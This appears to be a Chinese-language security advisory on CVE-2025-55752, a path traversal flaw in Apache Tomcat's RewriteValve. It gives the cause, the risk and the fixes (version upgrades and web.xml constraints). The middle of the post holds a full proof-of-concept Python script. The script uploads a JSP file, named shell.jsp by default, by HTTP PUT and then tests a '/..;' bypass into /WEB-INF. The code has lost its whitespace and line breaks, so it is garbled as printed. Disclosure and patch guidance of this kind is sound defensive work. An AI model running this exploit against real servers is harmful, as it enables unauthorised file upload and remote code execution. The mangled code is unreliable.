CVSS评分:7.5
CVE-2025-55752_ Apache Tomcat 安全漏洞
- 1. 漏洞原理
- 2. 漏洞危害
- 3. 漏洞修复
- 升级版本修复
- 配置修复
1. 漏洞原理
CVE-2025-55752 是 Apache Tomcat 中一个 相对路径遍历(Relative Path Traversal)漏洞。简单来说,这个漏洞允许攻击者通过精心构造的 URL 绕过安全约束,并且在某些条件下可能导致 RCE
漏洞发生在 Tomcat 的 URI 重写(RewriteValve)处理逻辑:
- URL 先被规范化(simplified/normalized)
- 然后才解码(URL decoded)
正确的安全逻辑应该是先解码,再规范化路径。但是因为顺序错误,攻击者可以利用 URL 编码技巧(如%2e%2e代表..)来避开安全检查
可利用的 POC:https://github.com/TAM-K592/CVE-2025-55752/
importrequestsimportargparseimporturllib3importsysfromurllib.parseimportquote urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)BANNER=""" CVE-2025-55752 Tomcat Path Bypass & Upload Detection Script ============================================================ This tool attempts to exploit a Rewrite Valve + normalization bypass to upload a test JSP file into a protected location (like /WEB-INF) and verify if the server is vulnerable to CVE-2025-55752. """defattempt_put_upload(target,filename,payload,verify_ssl):upload_path=f"/{filename}"url=f"{target}{upload_path}"try:print(f"[+] Attempting to upload payload to:{url}")response=requests.put(url,data=payload,verify=verify_ssl,timeout=10)ifresponse.status_codein[200,201,204]:print(f"[+] Upload successful! Response code:{response.status_code}")returnupload_pathelse:print(f"[-] Upload failed! Response code:{response.status_code}")returnNoneexceptExceptionase:print(f"[!] Upload error:{e}")returnNonedefcheck_access(target,path,verify_ssl):bypass_path=f"/..;{path}"url=f"{target}{bypass_path}"try:print(f"[+] Checking access to:{url}")response=requests.get(url,verify=verify_ssl,timeout=10)ifresponse.status_code==200:print("[+] Bypass successful! Target may be vulnerable.")returnTrueelse:print(f"[-] Access denied or not vulnerable (HTTP{response.status_code}).")returnFalseexceptExceptionase:print(f"[!] Access check error:{e}")returnFalsedefmain():parser=argparse.ArgumentParser(description="CVE-2025-55752 Exploit & Detection Tool")parser.add_argument("url",help="Target base URL (e.g., http://127.0.0.1:8080)")parser.add_argument("--filename",default="shell.jsp",help="Filename to upload (default: shell.jsp)")parser.add_argument("--payload",default="<% out.println(\"Bypassed!\"); %>",help="Payload content to upload")parser.add_argument("--check",action="store_true",help="Only check for path bypass without uploading")parser.add_argument("--no-ssl-verify",action="store_true",help="Disable SSL certificate verification")args=parser.parse_args()print(BANNER)verify_ssl=notargs.no_ssl_verifyifnotargs.url.startswith("http"):print("[-] Please include http:// or https:// in the URL")sys.exit(1)ifargs.check:check_access(args.url,f"/WEB-INF/{args.filename}",verify_ssl)else:uploaded_path=attempt_put_upload(args.url,args.filename,args.payload,verify_ssl)ifuploaded_path:check_access(args.url,f"/WEB-INF/{args.filename}",verify_ssl)if__name__=="__main__":main()2. 漏洞危害
微步提示中风险:
如果 Tomcat 部署启用了 HTTP PUT 请求 或者暴露了可写接口,在成功绕过目录保护后 上传恶意文件(如 JSP/Servlet 代码),可进一步触发 RCE
3. 漏洞修复
升级版本修复
升级到修复版本:
- Tomcat 11.0.11 或更高
- Tomcat 10.1.45 或更高
- Tomcat 9.0.109 或更高
配置修复
若非必要,禁用Tomcat的PUT请求功能,减少攻击面。可在conf/web.xml中配置:
<!-- 禁用PUT请求示例 --><security-constraint><web-resource-collection><web-resource-name>Disable PUT</web-resource-name><url-pattern>/*</url-pattern><http-method>PUT</http-method></web-resource-collection><auth-constraint/></security-constraint>确保web.xml中的安全约束配置正确,限制对敏感目录的访问:
<!-- 示例:在web.xml中添加安全约束 --><security-constraint><web-resource-collection><web-resource-name>Protected Area</web-resource-name><url-pattern>/WEB-INF/*</url-pattern><url-pattern>/META-INF/*</url-pattern></web-resource-collection><auth-constraint><role-name>admin</role-name></auth-constraint></security-constraint>)
